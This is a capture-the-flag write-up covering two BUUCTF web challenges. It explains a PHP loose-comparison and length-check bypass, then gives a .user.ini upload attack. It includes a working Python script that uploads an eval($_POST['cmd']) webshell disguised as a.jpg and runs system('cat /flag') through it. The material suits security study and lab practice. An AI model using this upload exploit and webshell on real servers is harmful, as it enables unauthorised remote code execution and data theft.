Buuctf[Geek Challenge 2019]BuyFlag 1 [SUCTF 2019]CheckIn 1

Buuctf[Geek Challenge 2019]BuyFlag 1

Open the challenge environment, then open the menu in the upper left corner and click the entry that leads to the challenge page (the original post shows these steps as screenshots).

Viewing the page source with F12 reveals the check logic. The page takes two POST parameters, password and money. The password must fail is_numeric() and yet compare equal to 404, so a value such as 404b works: is_numeric("404b") is false, while PHP's loose comparison "404b" == 404 is true, because PHP 7 converts the string using only its leading numeric prefix (PHP 8 changed this and compares a non-numeric string with an int as strings, so the trick no longer works there). According to the challenge text, the flag costs 100000000, so capture the request with Burp Suite.

Send the request to Repeater, set the money parameter to 100000000, and the response says the number is too long, which means the length of the string is limited rather than its value. Writing the amount in scientific notation, e.g. 1e9, keeps it short while still being numeric and large enough, so the check passes and the flag is bought.
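To make the two bypasses concrete, here is an added Python model of the checks (this is not the challenge's PHP source, which the post shows only as a screenshot). It re-implements PHP 7's is_numeric() and its loose string-to-int comparison; the server-side rules it assumes are: reject numeric passwords, require password == 404, reject a money string longer than 7 characters, and require money >= 100000000.

```python
import re

# PHP 7 numeric-string grammar: optional leading whitespace, sign, digits with
# optional fraction, optional exponent, and NO trailing whitespace (PHP 8
# additionally allows trailing whitespace).
_NUMERIC = r"[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?"
_FULL_NUMERIC = re.compile(r"^\s*" + _NUMERIC + r"\Z")
_LEADING_NUMERIC = re.compile(r"^\s*" + _NUMERIC)


def php_is_numeric(s: str) -> bool:
    """Model of PHP 7 is_numeric(): the whole string must be a number."""
    return _FULL_NUMERIC.match(s) is not None


def php7_to_number(s: str) -> float:
    """Model of PHP 7 string-to-number conversion: the leading numeric prefix
    is used if there is one, otherwise 0 ("404b" -> 404.0, "abc" -> 0.0)."""
    m = _LEADING_NUMERIC.match(s)
    return float(m.group(0)) if m else 0.0


def php7_loose_equals_int(s: str, n: int) -> bool:
    """Model of PHP 7 `$s == $n` for a string and an int: the string is
    converted to a number first. PHP 8 instead compares a non-numeric string
    with an int as two strings, so "404b" == 404 is false there."""
    return php7_to_number(s) == n


def check_password(password: str):
    # Assumed server logic: reject numeric passwords, then require == 404.
    if php_is_numeric(password):
        return False, "password must not be numeric"
    if not php7_loose_equals_int(password, 404):
        return False, "password is wrong"
    return True, "password ok"


MAX_MONEY_LEN = 7        # assumption: "number is too long" is a string-length check
FLAG_PRICE = 100000000   # price stated by the challenge


def check_money(money: str):
    if len(money) > MAX_MONEY_LEN:
        return False, "number is too long"
    if php7_to_number(money) < FLAG_PRICE:
        return False, "not enough money"
    return True, "money ok"


def buy_flag(password: str, money: str) -> bool:
    """True iff both checks pass, i.e. the modelled server would hand out the flag."""
    ok_p, _ = check_password(password)
    ok_m, _ = check_money(money)
    return ok_p and ok_m


if __name__ == "__main__":
    # "404" is numeric and rejected; "100000000" is 9 characters and rejected;
    # "404b" with "1e9" (3 characters, value 1e9) passes both checks.
    for pw, money in [("404", "1e9"), ("404b", "100000000"), ("404b", "1e9"), ("404 ", "1e8")]:
        print(f"password={pw!r:8} money={money!r:12} -> {buy_flag(pw, money)}")
```

The model also shows a second working password: "404 " with a trailing space is not numeric under PHP 7 but still converts to 404, and 1e8 is the smallest value in scientific notation that meets the price.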

[SUCTF 2019]CheckIn 1

Before doing this, learn about the .user.ini file; for details see this blog post: https://blog.csdn.net/byywcsnd/article/details/78221375
In short: when PHP runs under the CGI/FastCGI SAPI (for example php-fpm), it looks for a .user.ini file in the directory of the requested script and applies the PHP_INI_PERDIR directives in it. One such directive is auto_prepend_file, which makes PHP include the named file before running every .php script in that directory. An uploaded .user.ini plus a second uploaded file containing PHP code therefore turn any existing .php file in the upload directory into a webshell.

First construct the .user.ini file, then construct the a.jpg file; the contents of both are shown as screenshots in the original post.

Then upload the two files one after the other; each upload returns feedback.

The upload directory also contains a third file, index.php. That is exactly what the .user.ini needs: a .php script in the same directory, so requesting index.php makes PHP prepend a.jpg and execute the code in it. Connect to that index.php with AntSword.

The flag file shows up in AntSword's file browser; read it with the Linux cat command to get the final flag.
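As an added example (not the author's own files or scripts), the following Python builds the two upload files, sends them as multipart/form-data using only the standard library, and then talks to the resulting webshell. The target URL, form field name (fileUpload), upload directory and flag path are placeholders; the GIF89a magic-byte line and the cmd parameter name are assumptions, and the post's own .user.ini and a.jpg contents are only in its screenshots.

```python
import urllib.parse
import urllib.request
import uuid

# All target-specific names below are assumptions for this example: the real
# URL, form field name and upload directory are visible only in the original
# post's screenshots.
TARGET = "http://target.example/index.php"        # upload form handler
UPLOAD_DIR = "http://target.example/uploads/"      # directory the files land in
FIELD = "fileUpload"                               # <input type="file" name=...>

# Constructed file contents. The leading "GIF89a" line is there in case the
# uploader checks image magic bytes; PHP's ini parser accepts a bare key with
# no value, and PHP simply echoes the text before "<?php" as output.
USER_INI = b"GIF89a\nauto_prepend_file=a.jpg\n"
WEBSHELL = b"GIF89a\n<?php eval($_POST['cmd']); ?>\n"


def ini_directives(data: bytes) -> dict:
    """Minimal model of how PHP reads .user.ini: 'key=value' lines become
    directives; a bare word such as GIF89a is a key without a value and has
    no effect, which is why the magic-byte line does not break the file."""
    out = {}
    for line in data.decode("utf-8", "replace").splitlines():
        line = line.strip()
        if not line or line.startswith(";") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        out[key.strip()] = value.strip()
    return out


def build_multipart(field: str, filename: str, content: bytes, boundary=None):
    """Build a single-file multipart/form-data body; returns (content_type, body)."""
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: image/jpeg\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + content + tail


def upload(url: str, filename: str, content: bytes) -> str:
    """POST one file to the upload handler and return the response body."""
    ctype, body = build_multipart(FIELD, filename, content)
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": ctype})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def run_php(shell_url: str, php_code: str) -> str:
    """Send PHP code to the prepended eval() through the cmd POST parameter."""
    data = urllib.parse.urlencode({"cmd": php_code}).encode()
    req = urllib.request.Request(shell_url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    print(upload(TARGET, ".user.ini", USER_INI))
    print(upload(TARGET, "a.jpg", WEBSHELL))
    # index.php already exists in the upload directory; with the .user.ini in
    # place, requesting it runs a.jpg first. The flag path is an assumption:
    # list the filesystem first, as the post does with AntSword's file browser.
    print(run_php(UPLOAD_DIR + "index.php", "system('cat /flag');"))
```

Two caveats when reproducing this: .user.ini is only honoured by the CGI/FastCGI SAPI, not by mod_php, and PHP caches it for user_ini.cache_ttl seconds (300 by default), so the prepend can take up to five minutes to become active. If the upload filter rejects the "<?" open tag, the PHP code in a.jpg has to use another form; the post's screenshot shows what the author actually uploaded.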

Origin blog.csdn.net/weixin_52268949/article/details/114336616